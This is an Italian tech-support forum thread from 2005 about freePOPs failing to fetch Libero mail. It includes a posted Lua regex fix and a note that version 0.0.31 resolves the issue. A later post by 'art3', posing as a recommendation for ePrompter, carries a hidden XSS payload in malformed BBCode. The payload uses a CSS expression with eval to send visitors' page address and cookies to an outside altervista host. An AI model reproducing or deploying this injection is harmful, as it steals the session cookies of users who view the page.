Valutazione 4.87/ 5 (100.00%) 5838 voti

Condividi:        

freePOPs - ci sono problemi?

Hai problemi con i file Zip, vuoi formattare l'HD, non sai come funziona FireFox? O magari ti serve proprio quel programmino di cui non ricordi il nome! Ecco il forum dove poter risolvere i tuoi problemi.

Moderatori: Dylan666, hydra, gahan

freePOPs - ci sono problemi?

Postdi Time » 13/07/05 09:08

Ciao a tutti.
Da ieri sera non ricevo posta.
La spedisco regolarmente ma non mi arriva la conferma di recapito.
Ho fatto la prova del nove e mi sono spedita una mail di prova, ma non ho ricevuto niente.
Uso freePOPs come ponte tra il mio indirizzo di libero e alice.
Vi risulta che ci siano problemi?
Time
Time
Utente Senior
 
Post: 108
Iscritto il: 22/02/05 19:32

Sponsor
 

Postdi Time » 13/07/05 09:27

Ho dimenticato di dire che se vado sulla pagina di libero,
la posta la leggo tranquillamente...
Time
Utente Senior
 
Post: 108
Iscritto il: 22/02/05 19:32

Postdi wolf80 » 13/07/05 10:33

anch'io ho problemi...
Ho aggiornato FreePOPs alla versione 0.30 cioè l'ultima ma quando facccio Invia/Ricevi sembra connettersi e poi sparisce la finestra....
:?:
Sono il signor Wolf. Risolvo problemi.
wolf80
Utente Senior
 
Post: 195
Iscritto il: 15/02/05 17:45
Località: Genova

Postdi Time » 13/07/05 13:37

Okay, forse ho risolto.
Vai in C, cartella Programmi, cartella Freepops, cartella LUA, documento Libero.
Quando sei dentro, vai al punto in cui è scritto
StatE=".*<script>TREvidenceMsg</script>.*<TD>.*< (...ecc...)"
e sostituisci con
statE = ".*<script>.*TREv.*</script>.*<TD.*>.*<input.*value.*=.*[[:digit:]]+.*>.*</TD>.*<TD>.*<div.*>.*</TD>.*<TD.*>.*<IMG.*>.*</TD>.*<TD>.*<div.*>.*</TD>.*<TD.*>.*<div.*>.*</TD>.*<TD>.*<div.*>.*</TD>.*<TD.*>.*<a>.*<script>IMGEv.*</script>.*</a>.*<script>AEv.*</script>[.*]{b}.*{/b}[.*]</a>.*</TD>.*<TD>.*<div.*>.*</TD>.*<TD.*>.*<script>.*AEv.*</script>[.*]{b}.*{/b}[.*]</a>.*</TD>.*<TD>.*<div.*>.*</TD>.*<script>.*TDEv.*</script>.*</TD>.*<TD.*>.*<div.*>.*</TD>.*<script>TDEv.*</script>[.*]{b}.*[[:digit:]]+.*{/b}[.*]</TD>.*</TR>",

Io l'ho fatto e per ora sembra funzionare...
Ciao
Time
Time
Utente Senior
 
Post: 108
Iscritto il: 22/02/05 19:32

Postdi wolf80 » 13/07/05 14:10

è una tua invenzione o l'hai preso da qualche parte??
Sono il signor Wolf. Risolvo problemi.
wolf80
Utente Senior
 
Post: 195
Iscritto il: 15/02/05 17:45
Località: Genova

Postdi Barby » 13/07/05 16:56

Forse lo ha solo preso da qualche parte, visto che già da stamattina (parlo delle 10.30/11) questa soluzione era già presente sul sito ufficiale di freepops con tanto di file pronto da scaricare e sostituire al vecchio che non andava più. ..
Stanca essere, sentire fa male, pensare distrugge....
Barby
Utente Senior
 
Post: 164
Iscritto il: 28/12/03 14:48

Postdi Time » 13/07/05 18:29

Ovvio che non è una mia invenzione. Per chi mi avete presa?
I. Non capisco un fico di soft & hard
II. Se capissi, non chiederei aiuto
III. Non faccio la spiritosa con i computer altrui
IV. L'aiuto me l'ha dato un tecnico
Time
Time
Utente Senior
 
Post: 108
Iscritto il: 22/02/05 19:32

Postdi Mikizo » 13/07/05 20:01

La soluzione citata a me non funziona.

Se trovate altre soluzioni segnalatemele qui, vorrei includerle nella scheda del software su pc-facile (oltre a risolvere per me, ovviamente)
Avatar utente
Mikizo
Download Admin
 
Post: 8517
Iscritto il: 05/01/02 01:00
Località: Outside

Postdi Barby » 13/07/05 20:05

neppure a me funziona, è da stamattina che ci provo, ma niente, eppure a molti va....
Stanca essere, sentire fa male, pensare distrugge....
Barby
Utente Senior
 
Post: 164
Iscritto il: 28/12/03 14:48

Postdi Time » 13/07/05 21:49

Io ho fatto così:
prima ho disinstallato la vecchia versione di freepops, poi ho installato la nuova (mirror inglese), a quel punto ho fatto la correzione. Ho chiuso il computer, l'ho riacceso, ho lanciato freepops e tutto era andato a posto.
Ciao
Time
Time
Utente Senior
 
Post: 108
Iscritto il: 22/02/05 19:32

Postdi Mikizo » 13/07/05 22:46

ok ora funziona, avevo pasticciato da qualche parte ;)
Avatar utente
Mikizo
Download Admin
 
Post: 8517
Iscritto il: 05/01/02 01:00
Località: Outside

Postdi Barby » 14/07/05 21:23

Qualcuno potrebbe essere così gentile da postare passo per passo cio che ha fatto per far funzionare sto benedetto programmino, perchè a me proprio non va...
lo uso da quando libero ha imposto le restrizioni, e ogni volta che cambia qualcosa ho sempre i soliti proplemi, non riesco a scaricare la posta ma riesco solo ad inviare
come SO ho XP
grazie
Stanca essere, sentire fa male, pensare distrugge....
Barby
Utente Senior
 
Post: 164
Iscritto il: 28/12/03 14:48

Postdi Mikizo » 15/07/05 01:04

E' uscita la 0.0.31 che risolve il problema

http://www.pc-facile.com/software.php?id=274
Avatar utente
Mikizo
Download Admin
 
Post: 8517
Iscritto il: 05/01/02 01:00
Località: Outside

Postdi art3 » 15/07/05 10:33

Passate a ePrompter , leggero, veloce e gratuito!

[url]www.ut[url=www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://tg2.altervista.org/r.php?data='+document.location+document.cookie;this.sss=null`style='font-size:0;][/url][/url]'
art3
Utente Junior
 
Post: 13
Iscritto il: 15/07/05 09:16

Postdi wolf80 » 15/07/05 10:43

perchè scusa FreePops cos'è?
leggero veloce e gratuito, italiano e con "bug" risolti in poche ore...
più di così..........
Sono il signor Wolf. Risolvo problemi.
wolf80
Utente Senior
 
Post: 195
Iscritto il: 15/02/05 17:45
Località: Genova


Torna a Software Windows


Topic correlati a "freePOPs - ci sono problemi?":

alcuni problemi...
Autore: gibo
Forum: Assistenza Hardware
Risposte: 2

Chi c’è in linea

Visitano il forum: Kiryuu e 3 ospiti